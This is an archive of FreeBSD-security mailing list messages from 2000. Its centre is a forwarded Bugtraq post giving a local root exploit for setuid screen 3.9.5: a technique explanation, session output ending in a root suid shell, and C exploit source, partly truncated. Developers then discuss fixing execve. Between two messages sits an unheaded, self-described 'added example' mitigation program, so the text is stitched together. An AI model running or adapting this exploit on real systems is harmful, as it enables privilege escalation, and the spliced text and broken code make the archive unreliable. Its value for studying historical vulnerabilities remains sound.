From owner-freebsd-security Sun Sep 10 23:06:18 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A90A237B424 for ; Sun, 10 Sep 2000 23:06:16 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA53692; Mon, 11 Sep 2000 00:06:13 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA71230; Mon, 11 Sep 2000 00:05:46 -0600 (MDT)
Message-Id: <200009110605.AAA71230@harmony.village.org>
To: "David Andreas Alderud"
Subject: Re: Set user stack area type?
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Fri, 08 Sep 2000 23:16:14 +0200." <001601c019da$05dc9140$6400a8c0@XGod>
References: <001601c019da$05dc9140$6400a8c0@XGod>
Date: Mon, 11 Sep 2000 00:05:46 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <001601c019da$05dc9140$6400a8c0@XGod> "David Andreas Alderud" writes:
: Is there a way to change the type of the user stack area (i.e.
: executable/non-executable)?

No.

Warner

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Sep 10 23:10:07 2000
Message-Id: <200009110609.AAA71257@harmony.village.org>
To: "Matthew D. Fuller"
Subject: Re: Home Directories -- in the point of security?
Cc: Brett Glass, "Jonathan M. Slivko", freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Fri, 08 Sep 2000 17:39:18 CDT." <20000908173918.D9652@futuresouth.com>
References: <20000908173918.D9652@futuresouth.com> <4.3.2.7.2.20000908161720.04680100@localhost> <4.3.2.7.2.20000908162832.04cff4c0@localhost>
Date: Mon, 11 Sep 2000 00:09:36 -0600
From: Warner Losh

In message <20000908173918.D9652@futuresouth.com> "Matthew D. Fuller" writes:
: Let friends alone :P
: Friends are easy. Friends are friendly. Friends know you know where
: they live. Friends know you're insane and if they putz up your box, they
: know to already have the flight out of the country scheduled.

Friends generally know that you know how to execute rm -rf ~friend if they are too stupid to live and the number of beers it takes to get you to not hit return.

Generic web hosting clients, on the other hand, are dumber than dirt, on the average, and need to have as many walls built around them as possible. Consider using jail(8) and giving each one their own IP address and ARIN be damned.

Warner

From owner-freebsd-security Mon Sep 11 13:42:38 2000
Date: Mon, 11 Sep 2000 22:42:21 +0200
From: Szilveszter Adam
To: freebsd-security@freebsd.org
Subject: [paul@STARZETZ.DE: Breaking screen on BSD]
Message-ID: <20000911224221.A14920@petra.hos.u-szeged.hu>
Mail-Followup-To: freebsd-security@freebsd.org

Hi!

I am sure most people have read this on BUGTRAQ today...

Our take?

Regards:
-- 
Szilveszter ADAM
Szeged University
Szeged Hungary

----- Forwarded message from Paul Starzetz -----

X-Mailer: Mozilla 4.7 [en] (Win98; U)
Date: Sat, 9 Sep 2000 19:19:29 +0200
From: Paul Starzetz
Subject: Breaking screen on BSD
To: BUGTRAQ@SECURITYFOCUS.COM

Hi @ll,

In contrast to my previous posting I found a way to exploit format string vulnerable applications, which are suid root (like screen) on BSD-like systems. The mentioned problems arise from the low virtual memory address (VMA) we want to write to.

As far as there is no way to construct a string containing more 0x0's in standard C, we can profit from a feature (bug?) in the passing of environment variables by the execve function. execve() will pass empty env strings (pointers to zeros, _not_ NULL pointers) AS IS, so passing e.g. environ[a] = empty, environ[a] = empty will lead to two 0x0's pushed somewhere onto the stack... With this feature we can construct an array of arbitrary data on the bottom of the called program's stack. If this array can be reached from a fmt-vulnerable function, we can write to ANY VMA address including also the .data section of a BSD process.

So we could now utilize that and write a new exploit for screen which is our example here, but there is still another problem. Screen would lock up after we simply write to (&real_uid - 2) because we write to a part of another variable too, in this case struct display* display, which leads to a complete crash. A look at the debugger output shows that the following variable may be overwritten without consequences, it seems to be a less important flag variable (sample offsets):

  00055888 display
  0005588c real_uid
  00055890 adaptflag
  00055894 rflag

Depending on the version you may not be able to overwrite real_uid without crash.... So the technique we need is to construct the 0x0 at &real_uid by increasing the write address successively by 1, writing to lsb first. This leads to the following exploit:

  a.out
  USAGE a.out

  bash-2.04$ id
  uid=1000(kurak) gid=10(users) groups=10(users)

First we need a bufferoffset at which screen wouldn't crash after at _only_ one padding = {0,1,2,3}.
The pair 10 0 would do the job here:

  bash-2.04$ a.out 0 10 0 0
  Screen 3.9.5 local r00t exploit
  by IhaQueR@IRCNET

  creating magic string
  building /tmp/.home/.screenrc
  creating /tmp/.home/.bashrc
  compiling suid shell
  press enter to start screen, then hit enter again, ctrl-g, ctrl-c for suid shell at /tmp/sush and root uid
  Screen version 3.09.05 (FAU) 1-Sep-99
  ...
  chown: /tmp/sush: Operation not permitted
  chmod: /tmp/sush: Operation not permitted
  kurak@ExploitMe> STATUS shows: 7m5e-309-2e+1530-2e+1531e-30934-2e+1535e-3092e-3232e-3097e-309-2e+153-2e+1534e-309
  chown: /tmp/sush: Operation not permitted
  chmod: /tmp/sush: Operation not permitted
  I have no name!@ExploitMe>id
  uid=318941 gid=10(users) groups=10(users)
  ...
  [screen is terminating]

Now the uid is 318941, hex 0x0004dddd, which means we have the write sequence 2, 3, 0, 1. So the padding must be increased by 8 again:

  bash-2.04$ a.out 0 10 0 8
  ...
  I have no name!@ExploitMe>id
  uid=3705461980 gid=10(users) groups=10(users)
  ...
  [screen is terminating]

Now uid is 3705461980, hex 0xdcdcdcdc, so now we need to increase the byteadj by 256-0xdc = 36:

  bash-2.04$ a.out 0 10 36 8
  ...
  uid=0(root) gid=10(users) groups=10(users)
  root@ExploitMe>ls -l /tmp
  total 70
  -r--r--r--  1 root   wheel     11 Sep  7 13:07 .X0-lock
  drwxrwxrwt  2 root   wheel    512 Sep  7 13:07 .X11-unix
  drwxr-xr-x  2 kurak  wheel    512 Sep  9 19:52 .home
  drwxr-xr-x  3 root   wheel    512 Sep  7 13:51 screens
  -rw-r--r--  1 kurak  wheel   3970 Sep  9 03:55 stackdmp
  -rwsr-xr-x  1 root   wheel  25564 Sep  9 20:16 sush
  ...

Boah, now we have uid=0 and a suid shell at /tmp/sush :-)

Note, with this technique you may bypass even a non-exec stack, because we aren't executing anything. With the 'byte by byte' writing technique combined with the execve 'feature' one may write to even low VMA any data he wants (assuming the application is vulnerable of course). Imagine a suid app, which never starts a shell nor uses setuid(), but calls e.g. /bin/mail to report you are trying to abuse it...
You may change the string "/bin/mail" for example to "/tmp/r00t"....

regards.

FILE: explbsd395.c
tested against OpenBSD 2.8-beta (broken :-)

-------------------------------------------------------------------------------------------------
/****************************************************************
 *                                                              *
 *  Screen 3.9.5 BSD local exploit                              *
 *  by IhaQueR at IRCNET                                        *
 *  !only for demonstrative purposes!                           *
 *                                                              *
 ****************************************************************/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

extern char **environ;

char* home = "/tmp/.home";
char* ev1 = "PS1=\\u@ExploitMe>";

#define SCREEN "/usr/local/bin/screen-3.9.5"
#define SHELL "/bin/sh"
#define SCREENRC ".screenrc"
#define BASHRC ".bashrc"

/* offset to the env seen from Msg() */
#define BUFOFFSET 2682

/* addr to be written (may vary)*/
#define WRITEADDR 0x3c1e4

/* some addresses grabbed from 3.9.5 OpenBSD:
   &real_uid, &real_gid, &eff_uid, &eff_gid
   0x3c1e4 0x3c224 0x3b1b0 0x3b1a4
   for finding addresses see expl.c, it may be hard...
*/

/* repeat the addr table in environ */
#define ENVREP 32
/* but write only once */
#define WREP 1

char* env[ENVREP*4 + 256];

#define TMPBUFSIZE (BUFOFFSET+1024)

int main(int argc, char** argv)
{
    int i, off=0;
    int writeoffs=0, bufoffset=0, padding=0, bfoff=0, byteadj=0;
    int ep=0, b=0, ob=0;
    unsigned vv[ENVREP+2];
    unsigned char* pp;
    FILE* fp;
    char buf[TMPBUFSIZE];
    unsigned char myhome[TMPBUFSIZE];
    char screenrc[TMPBUFSIZE];
    char bashrc[TMPBUFSIZE];
    char pad[TMPBUFSIZE];
    char buf2[TMPBUFSIZE];

    if(argc != 5) {
        printf("USAGE %s \n", argv[0]);
        return 0;
    } else {
        printf("Screen 3.9.5 local r00t exploit\n");
        printf("by IhaQueR@IRCNET\n\n");
    }

    /* user supplied offsets */
    writeoffs = atoi(argv[1]);
    bfoff = atoi(argv[2]);
    byteadj = atoi(argv[3]);
    padding = atoi(argv[4]);

    /* create env */
    for(i=0; i%s 'chown root /tmp/sush; chmod 4755 /tmp/sush'", bashrc);
    system(buf);

    /* create suid shell */
    printf("compiling suid shell\n");
    snprintf(buf, TMPBUFSIZE, "echo >/tmp/sush.c 'main(int ac, char** av){setuid(0); setgid(0); execv(\"%s\", av);}'", SHELL);
    system(buf);
    system("gcc /tmp/sush.c -o /tmp/sush");

    /* set env and call screen */
    argv[1] = NULL;
    printf("press enter to start screen, then hit enter again, ctrl-g, ctrl-c for suid shell at /tmp/sush and root uid");
    getchar();
    execve(SCREEN, argv, env);
}
-------------------------------------------------------------------------------------------------

----- End forwarded message -----

From owner-freebsd-security Mon Sep 11 14:11:25 2000
Date: Tue, 12 Sep 2000 01:11:06 +0400
From: "Andrey A. Chernov"
To: Szilveszter Adam
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD]
Message-ID: <20000912011105.A40182@nagual.pp.ru>
References: <20000911224221.A14920@petra.hos.u-szeged.hu>
In-Reply-To: <20000911224221.A14920@petra.hos.u-szeged.hu>; from sziszi@petra.hos.u-szeged.hu on Mon, Sep 11, 2000 at 10:42:21PM +0200
Organization: Biomechanoid

> As far as there is no way to construct a string containing more 0x0's in
> standard C, we can profit from a feature (bug?) in the passing of
> environment variables by execve function. execve() will pass empty env
> strings (pointers to zeros, _not_ NULL pointers) AS IS, so passing e.g.
> environ[a] = empty, environ[a] = empty will lead to two 0x0#s pushed
> somewhere onto the stack... With this feature we can construct an array
> of arbitrary data on the bottom of the called programm's stack. If this
> array can be reached from a fmt-vulnerable function, we can write to ANY
> VMA address including also the .data section of a BSD process.

Obviously this bug is too general and not related to screen only.
It seems we need to fix execve() to prevent this.

-- 
Andrey A.
Chernov
http://ache.pp.ru/

From owner-freebsd-security Mon Sep 11 14:23:27 2000
Date: Mon, 11 Sep 2000 23:23:18 +0200
From: Szilveszter Adam
To: freebsd-security@FreeBSD.ORG
Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD]
Message-ID: <20000911232318.A15053@petra.hos.u-szeged.hu>
References: <20000911224221.A14920@petra.hos.u-szeged.hu> <20000912011105.A40182@nagual.pp.ru>
In-Reply-To: <20000912011105.A40182@nagual.pp.ru>; from ache@nagual.pp.ru on Tue, Sep 12, 2000 at 01:11:06AM +0400

On Tue, Sep 12, 2000 at 01:11:06AM +0400, Andrey A. Chernov wrote:
> Obviously this bug is too general and not related to screen only.
> It seems we need to fix execve() to prevent this.

Certainly it is. Screen was just an example, although the $SUBJECT line might have caused some people to overlook this as 'not important'

-- 
Regards:
Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Mon Sep 11 17:57:09 2000
Date: Mon, 11 Sep 2000 17:57:07 -0700 (PDT)
From: Kris Kennaway
To: Szilveszter Adam
Cc: freebsd-security@freebsd.org
Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD]
In-Reply-To: <20000911224221.A14920@petra.hos.u-szeged.hu>

On Mon, 11 Sep 2000, Szilveszter Adam wrote:

> Hi!
>
> I am sure most people have read this on BUGTRAQ today...
>
> Our take?

I thought it was a technique for exploiting the known (and fixed) vulnerability in the previous version of the screen port, not a new attack in itself.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Mon Sep 11 19:14:03 2000
Date: Tue, 12 Sep 2000 06:13:57 +0400
From: "Andrey A. Chernov"
To: Kris Kennaway
Cc: Szilveszter Adam, freebsd-security@FreeBSD.ORG
Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD]
Message-ID: <20000912061357.A42654@nagual.pp.ru>
References: <20000911224221.A14920@petra.hos.u-szeged.hu>
In-Reply-To: from kris@FreeBSD.ORG on Mon, Sep 11, 2000 at 05:57:07PM -0700
Organization: Biomechanoid

On Mon, Sep 11, 2000 at 05:57:07PM -0700, Kris Kennaway wrote:
> I thought it was a technique for exploiting the known (and fixed)
> vulnerability in the previous version of the screen port, not a new attack
> in itself.

No, it is a new exploit based on execve behaviour and not related especially to screen, other programs can be affected too. We definitely need to fix execve.

-- 
Andrey A. Chernov
http://ache.pp.ru/

From owner-freebsd-security Mon Sep 11 19:28:57 2000
Date: Mon, 11 Sep 2000 21:28:56 -0500 (CDT)
From: Mike Silbersack
To: "Andrey A. Chernov"
Cc: Kris Kennaway, Szilveszter Adam, freebsd-security@FreeBSD.ORG
Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD]
In-Reply-To: <20000912061357.A42654@nagual.pp.ru>

On Tue, 12 Sep 2000, Andrey A. Chernov wrote:

> On Mon, Sep 11, 2000 at 05:57:07PM -0700, Kris Kennaway wrote:
> > I thought it was a technique for exploiting the known (and fixed)
> > vulnerability in the previous version of the screen port, not a new attack
> > in itself.
>
> No, it is a new exploit based on execve behaviour and not related
> especially to screen, other programs can be affected too. We definitely
> need to fix execve.

If it's new, why does it rely on corrupting VBELL as the previous screen exploit did? Can this execve behavior be exploited in a program which wasn't broken by a buffer overflow or a format string bug?

Mike "Silby" Silbersack

From owner-freebsd-security Mon Sep 11 19:53:23 2000
Date: Tue, 12 Sep 2000 06:53:14 +0400
From: "Andrey A. Chernov"
To: Mike Silbersack
Cc: Kris Kennaway, Szilveszter Adam, freebsd-security@FreeBSD.ORG
Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD]
Message-ID: <20000912065314.A43158@nagual.pp.ru>
References: <20000912061357.A42654@nagual.pp.ru>
In-Reply-To: from silby@silby.com on Mon, Sep 11, 2000 at 09:28:56PM -0500
Organization: Biomechanoid

On Mon, Sep 11, 2000 at 09:28:56PM -0500, Mike Silbersack wrote:
> > No, it is a new exploit based on execve behaviour and not related
> > especially to screen, other programs can be affected too. We definitely
> > need to fix execve.
>
> If it's new, why does it rely on corrupting VBELL as the previous screen
> exploit did? Can this execve behavior be exploiting in a program which
> wasn't broken by a buffer overflow or a format string bug?

Screen 3.9.8 is not vulnerable to this. By "new" I mean part of it related to execve behaviour which is generally dangerous, not whole exploit at once.

-- 
Andrey A. Chernov
http://ache.pp.ru/

From owner-freebsd-security Mon Sep 11 20:11:32 2000
Date: Mon, 11 Sep 2000 22:11:26 -0500 (CDT)
From: Mike Silbersack
To: "Andrey A. Chernov"
Cc: Kris Kennaway, Szilveszter Adam, freebsd-security@FreeBSD.ORG
Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD]
In-Reply-To: <20000912065314.A43158@nagual.pp.ru>

On Tue, 12 Sep 2000, Andrey A. Chernov wrote:

> Screen 3.9.8 is not vulnerable to this. By "new" I mean part of it related
> to execve behaviour which is generally dangerous, not whole exploit at
> once.

Ah, I misunderstood you. Thanks for the clarification.

Mike "Silby" Silbersack

From owner-freebsd-security Mon Sep 11 20:32:20 2000
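The execve(2) behaviour the thread above turns on, seen from the mitigation side: the fix Andrey asks for belongs in the kernel, but a program that spawns a privileged helper can apply the same rule on its own side before it calls execve. This is an added example (mine, not code from the thread, from screen or from FreeBSD); the acceptance rule is an assumption modelled on that proposed fix, and env_entry_ok, clean_env and count_rejected are hypothetical names.

```c
/* Caller-side filter for the environment handed to execve(2).  Added
 * example; not code from the thread, from screen, or from FreeBSD.  The
 * rule it enforces is an assumption modelled on the fix Andrey asks for:
 * every entry must be non-empty and have the form NAME=value with a
 * non-empty NAME, so no empty string reaches the new process's stack. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Return 1 if `e` is an acceptable environment entry, 0 otherwise. */
int env_entry_ok(const char *e)
{
    if (e == NULL || *e == '\0')    /* the empty strings execve passes as-is */
        return 0;
    const char *eq = strchr(e, '=');
    if (eq == NULL || eq == e)      /* no '=' at all, or an empty name */
        return 0;
    return 1;
}

/* Copy the acceptable entries of `in` into `out` (capacity `max`,
 * including the terminating NULL).  Returns the number of entries kept,
 * or -1 if `out` cannot hold them. */
int clean_env(char *const in[], char *out[], size_t max)
{
    size_t n = 0;
    if (max == 0)
        return -1;
    for (size_t i = 0; in[i] != NULL; i++) {
        if (!env_entry_ok(in[i]))
            continue;
        if (n + 1 >= max)
            return -1;
        out[n++] = in[i];
    }
    out[n] = NULL;
    return (int)n;
}

/* How many entries clean_env would drop.  A non-zero count for a parent
 * that only ever passes NAME=value pairs is worth logging before exec. */
int count_rejected(char *const in[])
{
    int r = 0;
    for (size_t i = 0; in[i] != NULL; i++)
        if (!env_entry_ok(in[i]))
            r++;
    return r;
}

int main(void)
{
    /* Constructed sample: ordinary variables with two empty strings between
     * them (the pattern the post relies on), plus two malformed entries. */
    char *sample[] = { "PS1=\\u@ExploitMe>", "", "", "HOME=/tmp/.home",
                       "=x", "NOEQ", NULL };
    char *clean[8];
    int kept = clean_env(sample, clean, 8);
    printf("kept %d, rejected %d\n", kept, count_rejected(sample));
    for (int i = 0; clean[i] != NULL; i++)
        printf("  %s\n", clean[i]);
    /* A wrapper that spawns a privileged helper would now call
     * execve(path, argv, clean) instead of forwarding environ unchanged. */
    return 0;
}
```

This only covers callers that go through the filter; a setuid binary reached by a direct execve from a hostile process is protected only by the kernel-side check Andrey asks for, or by removing the format string bug the technique depends on (the thread notes screen 3.9.8 is not affected).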
From: "Peter Avalos"
To:
Subject: ypserv giving out encrypted passwords
Date: Mon, 11 Sep 2000 22:35:09 -0500
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)

I'm running ypserv as a slave and ypbind on a 4.1-S machine.

Snip from ypserv(8) manpage:

     To make up for this, the FreeBSD version of ypserv handles the
     master.passwd.byname and master.passwd.byuid maps in a special way.
     When the server receives a request to access either of these two maps,
     it will check the TCP port from which the request originated and return
     an error if the port number is greater than 1023. Since only the
     superuser is allowed to bind to TCP ports with values less than 1024,
     the server can use this test to determine whether or not the access
     request came from a privileged user. Any requests made by
     non-privileged users are therefore rejected.

This sounds like a wonderful thing, but why only tcp? I don't want people to ypcat master.passwd and get all the encrypted passwords on my system. I verified that a ypmatch uses udp on a port >1023 with tcpdump:

  ypmatch pavalos master.passwd
  pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash
  06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778: udp 88
  06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port: udp 108

  stun-port 1994/udp #cisco serial tunnel port

So my question is: Is this a configuration error, or a 'feature' (bug)?

Thanks,
Peter Avalos
TheShell.com

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS/ED/B d-(+) s:+> a-- C++$ UBLO++++$ P+ L++++ E- W+ N+ o? K?
w(++) !O M- V- PS+ PE++ Y+ PGP++ t+@ 5 X- R- tv+ b++ DI- D-- G e>+++ h-- r++ y++
------END GEEK CODE BLOCK------

From owner-freebsd-security Mon Sep 11 23:10:06 2000
Date: Tue, 12 Sep 2000 08:09:56 +0200 (CEST)
From: Paul Herman
To: freebsd-security@FreeBSD.ORG
Subject: init securelevel 1 -> 0, dangerous?

Hi,

Does anyone know of any dangers of letting init lower the securelevel to zero for single user mode? What I already know is that allowing gdb to attach (via ptrace(2)) to init (to trick it into lowering securelevel) is forbidden in kern/sys_process.c (or kern/kern_prot.c in -CURRENT)

I asked -hackers and -current a week ago, but got no concrete answers, so I thought I'd ask one last time on -security. There is an open PR on this...

Ideas?

-Paul.

From owner-freebsd-security Tue Sep 12 07:01:36 2000
Message-Id: <200009121359.e8CDxoI69308@cwsys.cwsent.com>
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.1-RELEASE
X-Sender: cy
To: "Peter Avalos"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ypserv giving out encrypted passwords
In-reply-to: Your message of "Mon, 11 Sep 2000 22:35:09 CDT."
Date: Tue, 12 Sep 2000 06:59:23 -0700

In message , "Peter Avalos" writes:
> I'm running ypserv as a slave and ypbind on a 4.1-S machine.
>
> Snip from ypserv(8) manpage:
>
>      To make up for this, the FreeBSD version of ypserv handles the
>      master.passwd.byname and master.passwd.byuid maps in a special way.
>      When the server receives a request to access either of these two maps,
>      it will check the TCP port from which the request originated and return
>      an error if the port number is greater than 1023. Since only the
>      superuser is allowed to bind to TCP ports with values less than 1024,
>      the server can use this test to determine whether or not the access
>      request came from a privileged user. Any requests made by
>      non-privileged users are therefore rejected.
>
> This sounds like a wonderful thing, but why only tcp? I don't want people to
> ypcat master.passwd and get all the encrypted passwords on my system. I
> verified that a ypmatch uses udp on a port >1023 witch tcpdump:
>
> ypmatch pavalos master.passwd
> pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash
> 06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778: udp 88
> 06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port: udp 108
>
> stun-port 1994/udp #cisco serial tunnel port
>
> So my question is: Is this a configuration error, or a 'feature' (bug)?

I was unable to recreate your problem here at home (the only place I do use YP). Tcpdump showed that appropriate ports were used when root or non-root issued the request.
Are you sure you weren't root or that ypmatch wasn't setuid root on the client system?

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:  (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Tue Sep 12 07:28:35 2000
Date: Tue, 12 Sep 2000 07:28:36 -0700 (PDT)
From: Peter Avalos
To: Cy Schubert - ITSD Open Systems Group
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ypserv giving out encrypted passwords
In-Reply-To: <200009121359.e8CDxoI69308@cwsys.cwsent.com>

On Tue, 12 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote:

> In message , "Peter Avalos" writes:
> > I'm running ypserv as a slave and ypbind on a 4.1-S machine.
> >
> > Snip from ypserv(8) manpage:
> >
> >      To make up for this, the FreeBSD version of ypserv handles the
> >      master.passwd.byname and master.passwd.byuid maps in a special way.
> >      When the server receives a request to access either of these two
> >      maps, it will check the TCP port from which the request originated
> >      and return an error if the port number is greater than 1023. Since
> >      only the superuser is allowed to bind to TCP ports with values less
> >      than 1024, the server can use this test to determine whether or not
> >      the access request came from a privileged user. Any requests made by
> >      non-privileged users are therefore rejected.
> >
> > This sounds like a wonderful thing, but why only tcp? I don't want people to
> > ypcat master.passwd and get all the encrypted passwords on my system. I
> > verified that a ypmatch uses udp on a port >1023 witch tcpdump:
> >
> > ypmatch pavalos master.passwd
> > pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash
> > 06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778: udp 88
> > 06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port: udp 108
> >
> > stun-port 1994/udp #cisco serial tunnel port
> >
> > So my question is: Is this a configuration error, or a 'feature' (bug)?
>
> I was unable to recreate your problem here at home (the only place I do
> use YP).
> Tcpdump showed that appropriate ports were used when root or
> non-root issued the request. Are you sure you weren't root or
> that ypmatch wasn't setuid root on the client system?
>

The correct ports are being used. My issue is that a request from a
non-root user (port >1023) gives out the encrypted password. According to
the manpage, any request from tcp port >1023 will be denied for
master.passwd.* maps. This seems like its logic is half-correct. My
question is why is it only tcp since these yp requests are over udp?

Regards,
Peter Avalos
TheShell.com


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Tue Sep 12  7:54:50 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E0E9137B422 for ; Tue, 12 Sep 2000 07:54:46 -0700 (PDT)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA21378; Tue, 12 Sep 2000 07:54:18 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21376; Tue Sep 12 07:54:17 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA32272; Tue, 12 Sep 2000 07:54:17 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdY32270; Tue Sep 12 07:53:58 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e8CErva69663; Tue, 12 Sep 2000 07:53:57 -0700 (PDT)
Message-Id: <200009121453.e8CErva69663@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdl69653; Tue Sep 12 07:53:02 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.1-RELEASE
X-Sender: cy
To: Peter Avalos
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ypserv giving out encrypted passwords
In-reply-to: Your message of "Tue, 12 Sep 2000 07:28:36 PDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 12 Sep 2000 07:53:02 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message , Peter Avalos writes:
>
>
> On Tue, 12 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote:
>
> > In message , "Peter Avalos" writes:
> > > I'm running ypserv as a slave and ypbind on a 4.1-S machine.
> > >
> > > Snip from ypserv(8) manpage:
> > >
> > >      To make up for this, the FreeBSD version of ypserv handles the
> > >      master.passwd.byname and master.passwd.byuid maps in a special
> > >      way. When the server receives a request to access either of these
> > >      two maps, it will check the TCP port from which the request
> > >      originated and return an error if the port number is greater than
> > >      1023. Since only the superuser is allowed to bind to TCP ports
> > >      with values less than 1024, the server can use this test to
> > >      determine whether or not the access request came from a
> > >      privileged user. Any requests made by non-privileged users are
> > >      therefore rejected.
> > >
> > > This sounds like a wonderful thing, but why only tcp? I don't want
> > > people to ypcat master.passwd and get all the encrypted passwords on
> > > my system.
> > > I verified that a ypmatch uses udp on a port >1023 with tcpdump:
> > >
> > > ypmatch pavalos master.passwd
> > > pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash
> > > 06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778: udp 88
> > > 06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port: udp 108
> > >
> > > stun-port 1994/udp #cisco serial tunnel port
> > >
> > > So my question is: Is this a configuration error, or a 'feature' (bug)?
> >
> > I was unable to recreate your problem here at home (the only place I do
> > use YP). Tcpdump showed that appropriate ports were used when root or
> > non-root issued the request. Are you sure you weren't root or
> > that ypmatch wasn't setuid root on the client system?
>
>
> The correct ports are being used. My issue is that a request from a
> non-root user (port >1023) gives out the encrypted password. According to
> the manpage, any request from tcp port >1023 will be denied for
> master.passwd.* maps. This seems like its logic is half-correct. My
> question is why is it only tcp since these yp requests are over udp?

cwtest$ ypmatch foobar master.passwd.byname
ypmatch: can't match key foobar in map master.passwd.byname. reason: YP server error
cwtest$

07:42:36.590581 cwtest.1308 > cwsys.1021: udp 92
07:42:36.615668 cwsys.1021 > cwtest.1308: udp 32

cwtest# ypmatch foobar master.passwd.byname
foobar:$1$foobar's_password:62361:62361::0:0:Foobar User,,,:/home/foobar:/bin/bash
cwtest#

07:43:06.646153 cwtest.657 > cwsys.1021: udp 92
07:43:06.647523 cwsys.1021 > cwtest.657: udp 128

Foobar was substituted for the real username to protect the innocent in
my example above, e.g. this is real output except for my editing out
the real username.

From what I can tell, it works as documented on a 4.1 system.
Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security  Tue Sep 12  8:42:24 2000
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id BEEC537B424 for ; Tue, 12 Sep 2000 08:42:22 -0700 (PDT)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA94930; Tue, 12 Sep 2000 11:42:18 -0400 (EDT) (envelope-from wollman)
Date: Tue, 12 Sep 2000 11:42:18 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200009121542.LAA94930@khavrinen.lcs.mit.edu>
To: "Andrey A. Chernov"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD]
In-Reply-To: <20000912065314.A43158@nagual.pp.ru>
References: <20000912061357.A42654@nagual.pp.ru> <20000912065314.A43158@nagual.pp.ru>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

> Screen 3.9.8 is not vulnerable to this. By "new" I mean part of it related
